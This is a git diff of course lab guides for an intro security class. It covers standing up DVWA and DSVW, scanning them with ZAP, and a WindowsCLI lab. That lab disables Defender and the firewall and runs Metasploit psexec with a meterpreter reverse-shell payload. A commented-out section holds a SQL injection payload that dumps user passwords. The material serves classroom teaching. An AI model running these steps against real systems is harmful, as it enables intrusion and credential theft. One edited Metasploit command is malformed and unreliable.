@@ -229,7 +249,7 @@ Please select our Hunt.  Now, we can run it.  Press the **Play** button above.
 
 ![](attachment/velociraptor_play.png)
 
-When you get the pop-up, select **Run it!**
+When you get the pop-up, select **Run them all!**
 
 >[!NOTE]
 >
@@ -257,7 +277,7 @@ Go ahead and open the **zip file**, navigate into the results folder.
 
 ![](attachment/velociraptor_opencsv.png)
 
-Then, open the csv file with **WordPad**.
+Then, open the csv file with **NotePad**.
 
 ![](attachment/velociraptor_wordpad.png)
 
@@ -284,3 +304,6 @@ Please be sure to destroy the lab environment!
 
 ---
 
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/WebLogReview/WebLogReview.md b/IntroClassFiles/Tools/IntroClass/WebLogReview/WebLogReview.md
index a81397ca..f3372fa6 100644
--- a/IntroClassFiles/Tools/IntroClass/WebLogReview/WebLogReview.md
+++ b/IntroClassFiles/Tools/IntroClass/WebLogReview/WebLogReview.md
@@ -2,45 +2,57 @@
 
 # Web Log Review
 
+# Windows VM
+
 In this lab we will be standing up a vulnerable web server called DVWA.  It is designed from the ground up to teach people about a number of web application attacks.
 
 While a full intro to web attacks is out of the scope of this class, it is great to show you how to use tools like ZAP to automatically look for some vulnerabilities, and to show you that automated tools do not always catch everything.
 
-Let’s get started by opening a Terminal as Administrator
 
-![](attachments/Clipboard_2020-06-12-10-36-44.png)
 
 
-When you get the User Account Control Prompt, select Yes.
+- Open **Ubuntu Shell**
 
-PS C:\Users\adhd> `docker run --rm -it -p 80:80 vulnerables/web-dvwa`
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/ae6d408b-7622-4545-b849-aef3d8fa0cb4" />
 
-![](attachments/Clipboard_2020-06-16-13-29-31.png)
 
-In another Command Prompt window run ipconfig and record your IP address.  Remember, your IP address may be different from mine.
 
-C:\Users\adhd>`ipconfig`
+```bash
+sudo su -
+```
 
-![](attachments/Clipboard_2020-06-16-13-29-46.png)
+Get your **Linux IP address**
 
+```bash
+ifconfig
+```
 
-Now, let's start ZAP.
+<img width="716" height="175" alt="Get_IP" src="https://github.com/user-attachments/assets/cc1893c9-3a96-4ddb-a16a-45f0bdad0e10" />
 
-![](attachments/Clipboard_2020-06-16-13-30-15.png)
 
+```bash
+docker run --rm -it -p 80:80 vulnerables/web-dvwa
+```
+
+<img width="1102" height="317" alt="image" src="https://github.com/user-attachments/assets/bbb8b00e-1ae1-4896-8ce5-3c9affbc5c79" />
 
-![](attachments/Clipboard_2020-06-16-13-30-46.png)
 
+Now, let's start ZAP.
+
+<img width="89" height="96" alt="image" src="https://github.com/user-attachments/assets/551b5e0b-1319-4c68-8619-02f6ae0a02e8" />
 
-Now, let's insert your IP address from the ipconfig command above and start the scan.
+
+
+![](attachments/Clipboard_2020-06-16-13-30-46.png)
 
 First, select the Automated Scan button: 
 
 ![](attachments/Clipboard_2020-12-11-06-43-22.png)
 
-Then enter the URL of your Docker system.  It will be in http://<WINDOWSIP> syntax like below:
+Then enter the URL of your Docker system.  It will be in `http://<LINUXIP>` syntax like below:
+
+<img width="455" height="152" alt="image" src="https://github.com/user-attachments/assets/36a48d43-c0ff-4b65-97db-8e9fb845a00a" />
 
-![](attachments/Clipboard_2020-12-11-06-45-20.png)
 
 Then select the Attack button:
 
@@ -49,11 +61,13 @@ Then select the Attack button:
 This will start the scan.  You should be able to see the scan activity in the lower part of ZAP.
 
 
-![](attachments/Clipboard_2020-12-11-06-47-23.png)
+<img width="947" height="362" alt="image" src="https://github.com/user-attachments/assets/49633ae1-1b42-4664-9950-ca334152e08d" />
+
+
+Now, let's go back to the **Command Prompt** window and see the logs:
 
-Now, let's go back to the Powershell window and see the logs:
+<img width="1106" height="622" alt="image" src="https://github.com/user-attachments/assets/0d8192d6-13b3-4b37-828f-f8b88d461a26" />
 
-![](attachments/Clipboard_2020-12-11-06-51-27.png)
 
 What are some things to look for?
 
@@ -73,7 +87,7 @@ Then attack.
 
 It is all about knowing our networks ad apps.
 
-# Going further
+### Going further
 
 https://owasp.org/
 
@@ -81,7 +95,31 @@ https://www.zaproxy.org/
 
 https://cirt.net/Nikto2
 
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
+***                                                                 
+
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/WindowsCLI/WindowsCLI.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/TCPDump/TCPDump.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+
+
+
+
+
+
+
+
+
 
 
 
diff --git a/IntroClassFiles/Tools/IntroClass/WebTesting/WebTesting.md b/IntroClassFiles/Tools/IntroClass/WebTesting/WebTesting.md
index 4ecc12c6..26222ac9 100755
--- a/IntroClassFiles/Tools/IntroClass/WebTesting/WebTesting.md
+++ b/IntroClassFiles/Tools/IntroClass/WebTesting/WebTesting.md
@@ -4,49 +4,54 @@
 
 # Web Testing
 
+# Windows VM
+
 In this lab we will be standing up a simple **Python Web Server** and a vulnerable web server called **DVWA**.  These are designed from the ground up to teach people about a number of web application attacks.
 
 While a full intro to web attacks is out of the scope of this class, it is great to show you how to use tools like **ZAP** to automatically look for some vulnerabilities, and to show you that automated tools do not always catch everything.
 
-You will need to start an **Kali** terminal.
+You will need to start an **Linux** terminal.
 
-![](attachments/OpeningKaliInstance.png)
 
-Alternatively, you can click on the **Kali** icon in the taskbar.
 
-![](attachments/TaskbarKaliIcon.png)
 
-Before going further, gain root access by running the following:
+- **Double-click** `Ubuntu Shell` on Desktop
+
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/196f7867-877b-4a37-bc02-1214e50e96a5" />
 
-<pre>sudo su -</pre>
 
-Navigate into the proper directory:
 
-<pre>cd /opt/Web_Testing</pre>
 
-![](attachments/navtodirectory.png)
+Navigate into the proper directory:
 
-We need to get our **Linux** IP address for later, so let's run the following command:
+```bash
+cd ~/Intro_To_SOC/Web_Testing
+```
 
-<pre>ifconfig</pre>
+Please note your **Linux** IP:
 
-![](attachments/ifconfig.png)
+```bash
+ifconfig
+```
 
-Please note your **Linux** IP address. As shown above, ours is **"10.10.1.117"**
+![Get_IPLinux.png](https://github.zendesk.com/attachments/token/n6uvR4jpusDEqeTL91GtzfodH/?name=Get_IPLinux.png)
 
 >[!NOTE]
 >
 >**YOUR IP WILL BE DIFFERENT!**
 
-Launch the python script.
+Launch the python script
+
+```bash
+python3 ./dsvw.py
+```
 
-<pre>python3 ./dsvw.py</pre>
+<img width="696" height="141" alt="2026-03-14_14-38" src="https://github.com/user-attachments/assets/a74a0640-3091-4182-89d8-e595141f31e7" />
 
-![](attachments/pythonscriptran.png)
 
 It's time to start **ZAP**! Go ahead and launch it from the desktop icon.
 
-![](attachments/OpeningZAP.png)
+<img width="77" height="97" alt="2026-03-14_14-26" src="https://github.com/user-attachments/assets/29673ac5-f788-453c-8f79-e7291bf7b329" />
 
 Once **ZAP** loads, you will see this pop-up on your screen. Ensure that **No, I do not want to persist this session at this moment in time** option is selected, and hit **"Start"**
 
@@ -66,6 +71,14 @@ Then, select **"Use traditional spider"** and then select **"Attack"**:
 
 ![](attachments/AutomatedScanSetup.png)
 
+
+>[!IMPORTANT]
+>The scan will probably break **DSVW**, you might have to start it again during during the scan:
+
+<img width="697" height="426" alt="2026-03-14_14-41" src="https://github.com/user-attachments/assets/f155ab76-3722-445a-9f4b-0cb18ea0e37c" />
+
+
+
 Scan progress will be shown by the progress bar in the center of your screen.
 When it gets done crawling and scanning, select **"Alerts"**:
 
@@ -73,6 +86,7 @@ When it gets done crawling and scanning, select **"Alerts"**:
 
 This shows that **ZAP** does a pretty good job of finding the easy to identify vulnerabilities.
 
+
 ***                                                                 
 <b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/deepbluecli/DeepBlueCLI.md)</i></b>
 
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/WebTesting.md b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/WebTesting.md
new file mode 100755
index 00000000..c5f08f70
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/WebTesting.md
@@ -0,0 +1,207 @@
+
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+# Web Testing
+
+# Windows VM
+
+In this lab we will be standing up a simple **Python Web Server** and a vulnerable web server called **DVWA**.  These are designed from the ground up to teach people about a number of web application attacks.
+
+While a full intro to web attacks is out of the scope of this class, it is great to show you how to use tools like **ZAP** to automatically look for some vulnerabilities, and to show you that automated tools do not always catch everything.
+
+You will need to start an **Linux** terminal.
+
+
+
+
+- **Double-click** `Ubuntu Shell` on Desktop
+
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/196f7867-877b-4a37-bc02-1214e50e96a5" />
+
+
+
+
+
+
+Navigate into the proper directory:
+
+```bash
+cd ~/Intro_To_SOC/Web_Testing
+```
+
+Please note your **Linux** IP:
+
+```bash
+ifconfig
+```
+
+<img width="1534" height="372" alt="Get_IPLinuxFromWindows" src="https://github.com/user-attachments/assets/03a424b9-3dcd-4d64-a2eb-4f9e2282b1e2" />
+
+
+>[!NOTE]
+>
+>**YOUR IP WILL BE DIFFERENT!**
+
+Launch the python script
+
+```bash
+python3 ./dsvw.py
+```
+
+<img width="696" height="141" alt="2026-03-14_14-38" src="https://github.com/user-attachments/assets/a74a0640-3091-4182-89d8-e595141f31e7" />
+
+
+It's time to start **ZAP**! Go ahead and launch it from the desktop icon.
+
+<img width="77" height="97" alt="2026-03-14_14-26" src="https://github.com/user-attachments/assets/29673ac5-f788-453c-8f79-e7291bf7b329" />
+
+Once **ZAP** loads, you will see this pop-up on your screen. Ensure that **No, I do not want to persist this session at this moment in time** option is selected, and hit **"Start"**
+
+![](attachments/nopersist.png)
+
+Let's do a quick test of the **Python Web Server**:
+
+Select **"Automated Scan"**
+
+![](attachments//automatedscanselect.png)
+
+Put in **your** Linux IP and port **"65412"** in as the URL to attack.
+
+<pre>http://[YOUR LINUX IP]:65412</pre>
+
+Then, select **"Use traditional spider"** and then select **"Attack"**:
+
+![](attachments/AutomatedScanSetup.png)
+
+
+>[!IMPORTANT]
+>The scan will probably break **DSVW**, you might have to start it again during during the scan:
+
+<img width="697" height="426" alt="2026-03-14_14-41" src="https://github.com/user-attachments/assets/f155ab76-3722-445a-9f4b-0cb18ea0e37c" />
+
+
+
+Scan progress will be shown by the progress bar in the center of your screen.
+When it gets done crawling and scanning, select **"Alerts"**:
+
+![](attachments/Alerts.png)
+
+This shows that **ZAP** does a pretty good job of finding the easy to identify vulnerabilities.
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/ACHunterCE.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/Sysmon/Sysmon.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+
+
+
+<!--
+
+REMOVED PER JOHNS REQUEST
+
+
+#OPTIONAL DVWA LAB!
+
+Let's get started by opening a Terminal as Administrator
+
+![](attachments/Clipboard_2020-06-12-10-36-44.png)
+
+When you get the User Account Control Prompt, select Yes.
+
+PS C:\Users\adhd> `docker run --rm -it -p 80:80 vulnerables/web-dvwa`
+
+![](attachments/Clipboard_2020-06-16-13-29-31.png)
+
+In another Command Prompt window run ipconfig and record your IP address.  Remember, your IP address may be different from mine.
+
+C:\Users\adhd>`ipconfig`
+
+
+![](attachments/Clipboard_2020-06-16-13-29-46.png)
+Now, let's start Chrome and play with DVWA. Please note that our class has a track record of DoSSing the Docker download for this section.  I recomend doing this after class when less than 100 people are hitting it at the same time.
+
+![](attachments/Clipboard_2020-06-16-13-31-13.png)
+
+When your browser runs, it usually connects to the Internet directly.  In this lab, however, we need it to connect to a local proxy (ZAP) to intercept and attack the web traffic.  To do this, we need to configure Chrome to use ZAP as the proxy.
+
+Now, lets configure the proxy:
+
+![](attachments/Clipboard_2020-06-16-13-32-34.png)
+
+
+
+ Now, we will need to surf to your IP address.  You recorded it above with the ipconfig command. Simply put http://<YOUR_IP> into the browser.
+
+You will get an error.  This is normal.  This is because the traffic is being intercepted by a proxy.  Normally, this would be very, very bad.   However, in this lab, we are proxying the traffic to test the app.  Go ahead and select Advanced:
+
+![](attachments/Clipboard_2020-06-16-13-33-08.png)
+Then, select Proceed.
+
+![](attachments/Clipboard_2020-06-16-13-33-19.png)
+
+The credentials are admin:password
+
+Please log in.
+
+For the first run, you will need to configure the database. 
+
+Please select Create / Reset Database
+
+![](attachments/Clipboard_2020-06-16-13-34-28.png)
+
+Now, log back in
+
+IF you go back to ZAP you will see that it is capturing the site data.  We could do this manually.  Simply clicking every page.  But, that would take a long time.  We can have ZAP do this for us automatically.  This is called crawling or spidering a website.
+
+Now, from ZAP lets spider the app:
+
+![](attachments/Clipboard_2020-06-16-13-35-51.png)
+
+When the pop-up hits, select Start Scan
+
+While scanning a site for links is cool.  We want to actively scan the site for vulnerabilities.   ZAP can do this as well.  This is called an active scan.
+
+Now, let's start the active scan:
+
+![](attachments/Clipboard_2020-06-16-13-36-47.png)
+
+When prompted, select Start Scan
+
+Scan Running:
+![](attachments/Clipboard_2020-06-16-13-37-27.png)
+
+When done, select Alerts
+
+![](attachments/Clipboard_2020-06-16-13-39-33.png)
+
+Did it find anything interesting?  Here is a problem with simply trusting automated tools. They tend to miss things.  Sure, it is great for finding the "easy" stuff.  But, they don't catch everything.  Not even close. 
+
+What vulnerabilities did your scan find? Share them with others on Discord.  Did they find anything different?
+
+If so, why do you think that is?
+
+
+I wanted to take a few moments and show you some things the scanner may have missed.
+
+Let's see if it missed anything..
+
+Here is just one example.
+
+![](attachments/Clipboard_2020-06-16-13-41-13.png)
+
+`%' or '0'='0' union select user, password from dvwa.users #`
+
+![](attachments/Clipboard_2020-06-16-13-44-15.png)
+-->
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Alerts.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Alerts.png
new file mode 100644
index 00000000..9000b265
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Alerts.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/AutomatedScan.PNG b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/AutomatedScan.PNG
new file mode 100644
index 00000000..25c9635a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/AutomatedScan.PNG differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/AutomatedScanIP.PNG b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/AutomatedScanIP.PNG
new file mode 100644
index 00000000..1bf25d71
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/AutomatedScanIP.PNG differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/AutomatedScanSetup.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/AutomatedScanSetup.png
new file mode 100644
index 00000000..386728f8
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/AutomatedScanSetup.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-12-10-36-44.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-12-10-36-44.png
new file mode 100755
index 00000000..4175daf4
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-12-10-36-44.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-29-31.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-29-31.png
new file mode 100755
index 00000000..93587bee
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-29-31.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-29-46.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-29-46.png
new file mode 100755
index 00000000..7944a2ae
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-29-46.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-30-15.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-30-15.png
new file mode 100755
index 00000000..9b3333fb
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-30-15.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-30-46.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-30-46.png
new file mode 100755
index 00000000..02d75d6d
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-30-46.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-31-13.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-31-13.png
new file mode 100755
index 00000000..925a2c71
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-31-13.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-32-34.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-32-34.png
new file mode 100755
index 00000000..cea2b48d
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-32-34.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-33-08.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-33-08.png
new file mode 100755
index 00000000..770d9b5b
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-33-08.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-33-19.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-33-19.png
new file mode 100755
index 00000000..c19a07c3
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-33-19.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-34-28.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-34-28.png
new file mode 100755
index 00000000..273c1e2c
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-34-28.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-35-51.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-35-51.png
new file mode 100755
index 00000000..78778454
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-35-51.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-36-47.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-36-47.png
new file mode 100755
index 00000000..46b264b8
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-36-47.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-37-27.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-37-27.png
new file mode 100755
index 00000000..97b563b5
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-37-27.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-39-33.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-39-33.png
new file mode 100755
index 00000000..8eef5853
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-39-33.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-41-13.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-41-13.png
new file mode 100755
index 00000000..67903728
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-41-13.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-44-15.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-44-15.png
new file mode 100755
index 00000000..e7ff2263
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/Clipboard_2020-06-16-13-44-15.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/OpeningKaliInstance.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/OpeningKaliInstance.png
new file mode 100644
index 00000000..128fe9d7
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/OpeningKaliInstance.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/OpeningZAP.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/OpeningZAP.png
new file mode 100644
index 00000000..14ecc50c
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/OpeningZAP.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/TaskbarKaliIcon.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/TaskbarKaliIcon.png
new file mode 100644
index 00000000..c8d6bd97
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/TaskbarKaliIcon.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/ZAPResults.PNG b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/ZAPResults.PNG
new file mode 100644
index 00000000..af0d0e1a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/ZAPResults.PNG differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/automatedscanselect.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/automatedscanselect.png
new file mode 100644
index 00000000..05eeeaf5
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/automatedscanselect.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/desktop.ini b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/desktop.ini
new file mode 100755
index 00000000..d6155493
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/desktop.ini
@@ -0,0 +1,2 @@
+[LocalizedFileNames]
+Clipboard_2020-06-12-10-36-44.png=@Clipboard_2020-06-12-10-36-44,0
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/ifconfig.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/ifconfig.png
new file mode 100644
index 00000000..f27d50e0
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/ifconfig.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/navtodirectory.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/navtodirectory.png
new file mode 100644
index 00000000..5d890eaf
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/navtodirectory.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/nopersist.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/nopersist.png
new file mode 100644
index 00000000..b3bf05ae
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/nopersist.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/pythonscriptran.png b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/pythonscriptran.png
new file mode 100644
index 00000000..aee22fc5
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/attachments/pythonscriptran.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/WindowsCLI/WindowsCLI.md b/IntroClassFiles/Tools/IntroClass/WindowsCLI/WindowsCLI.md
index c50416bf..f1646bea 100644
--- a/IntroClassFiles/Tools/IntroClass/WindowsCLI/WindowsCLI.md
+++ b/IntroClassFiles/Tools/IntroClass/WindowsCLI/WindowsCLI.md
@@ -6,19 +6,33 @@ In this lab, we will create **malware**, run it, and use the tools we went throu
 
 One of the best ways to learn is to actually just dig in and do it.  
 
-Let’s get started by opening a terminal.  
 
-![](attachments/OpeningKaliInstance.png)
 
-Alternatively, you can open a **Kali** instance by clicking the **Kali** logo in the taskbar.
 
-![](attachments/TaskbarKaliIcon.png)
+
+
+- Open **Ubuntu Shell**
+
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/ae6d408b-7622-4545-b849-aef3d8fa0cb4" />
+
+
+
+
+
+
+
+
 
 Before going any further, we need to ensure that **Windows Defender** is disabled. To do this, open a Windows **Powershell** by clicking the icon in the taskbar.
 
-![](attachments/OpeningPowershell.png)
 
-<pre>Set-MpPreference -DisableRealtimeMonitoring $true</pre>
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-15" src="https://github.com/user-attachments/assets/be17e180-e1a4-4b42-b537-9b2931ac0284" />
+
+
+
+```ps
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
 
 ![](attachments/windowscli_disabledefender.png)
 
@@ -32,70 +46,79 @@ Before going any further, we need to ensure that **Windows Defender** is disable
 
 Next, lets ensure the firewall is disabled.
 
-<pre>netsh advfirewall set allprofiles state off</pre>
+```ps
+netsh advfirewall set allprofiles state off
+```
 
 Next, set a password for the Administrator account that you can remember
 
-<pre>net user Administrator password1234</pre>
+```ps
+net user Administrator password1234
+```
 
 >[!NOTE]
 >
 >That is a very bad password. </br> Come up with something better. But, please remember it.
 
-Now that we disabled **Windows Defender**, we need to get our windows IP address for later.
-
-Within the Powershell window, please run the following command:
+Let's get our **Windows IP**:
 
-<pre>ipconfig</pre>
+```ps
+ipconfig
+```
 
->[!IMPORTANT]
->
->Please remember that your Windows IP address is not the same as your ADHD Linux System IP address. 
->
->In this instance, we need our **Windows IP**, so write it down for later!
+<img width="629" height="253" alt="2026-03-15_23-42" src="https://github.com/user-attachments/assets/6a8b012f-cd92-47fd-8f0d-eac30d124877" />
 
-Now head back to your **Kali** terminal.
+Now head back to your **Linux** terminal.
 
 We need to gain root access. To do that, run the following command:
 
-<pre>sudo su -</pre>
+```bash
+sudo su -
+```
 
 Next, we will start the **Metasploit** handler with the following command:
 
-<pre>msfconsole -q</pre>
+```bash
+msfconsole -q
+```
 
 It will take a second to connect, be patient!
 
 When connected, our terminal will look like this.
 
-![](attachments/windowscli_msfconnected.png)
+<img width="62" height="41" alt="2026-03-15_23-29" src="https://github.com/user-attachments/assets/1595387c-029b-462c-90dd-4430c0856bed" />
 
 Next, run the following command:
 
-<pre>use exploit/windows/smb/psexec</pre>
+```bash
+use exploit/windows/smb/psexec
+```
 
-![](attachments/windowscli_useexploit.png)
+<img width="677" height="88" alt="2026-03-15_23-36" src="https://github.com/user-attachments/assets/3918ae2d-9018-46e0-9e63-41536cafed35" />
 
 We will continue by running this command to set the location of the payload:
 
-<pre>set PAYLOAD windows/meterpreter/reverse_tcp</pre>
+```bash
+set windows/x64/meterpreter/reverse_tcp)
+```
 
 We also need to set the **RHOST IP** for the Windows system by using the following command:
 
-<pre>set RHOST 10.10.1.209</pre>
-
->[!NOTE]
->
->**Remember, your IP will be different!**
+```bash
+set RHOST win.cloudlab.lan
+```
 
-
